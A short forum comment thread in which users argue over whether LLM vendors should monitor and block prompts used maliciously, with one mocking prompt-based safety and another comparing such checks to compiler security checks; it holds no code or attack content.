▲ | echelon 6 days ago | |||||||
Then safety and alignment are a farce and these are not serious tools. This is 100% within the responsibility of the LLM vendors. Beyond the LLM, there is a ton of engineering work that can be put in place to detect this, monitor it, escalate, alert impacted parties, and thwart it. This is literally the impetus for funding an entire team or org within both of these companies to do this work. Cloud LLMs are not interpreters. They are network connected and can be monitored in real time. | ||||||||
▲ | lionkor 6 days ago | parent | next [-] | |||||||
You mean the safety and alignment that boils down to telling the AI to "please not do anything bad REALLY PLEASE DONT"? lol working great is it | ||||||||
| ||||||||
▲ | maerch 5 days ago | parent | prev [-] | |||||||
I’m really trying to understand your point, so please bear with me. As I see it, this prompt is essentially an "executable script". In your view, should all prompts be analyzed and possibly blocked based on heuristics that flag malicious intent? Should we also prevent the LLM from simply writing an equivalent script in a programming language, even if it is never executed? How is this different from requiring all programming languages (at least from big companies with big engineering teams) to include such security checks before code is compiled? | ||||||||
|